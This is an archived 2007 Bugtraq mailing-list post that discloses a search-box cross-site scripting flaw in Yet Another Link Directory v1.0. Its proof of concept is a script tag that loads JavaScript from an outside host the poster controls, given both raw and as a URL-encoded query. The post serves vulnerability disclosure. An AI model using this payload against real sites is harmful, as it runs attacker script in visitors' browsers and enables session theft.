lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070106130234.29111.qmail@securityfocus.com> Date: 6 Jan 2007 13:02:34 -0000 From: lunY@...fucktard.com To: bugtraq@...urityfocus.com Subject: Yet Another Link Directory v1.0 Yet Another Link Directory v1.0 http://yald.sourceforge.net/ Effected files: yald.php --------------------------- yald.php search box XSS User input isn't sanatized before being generated. In the search box for a PoC put: <script src=http://www.youfucktard.com/xss.js></script> url: http://example.com/yald.php?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E - Luny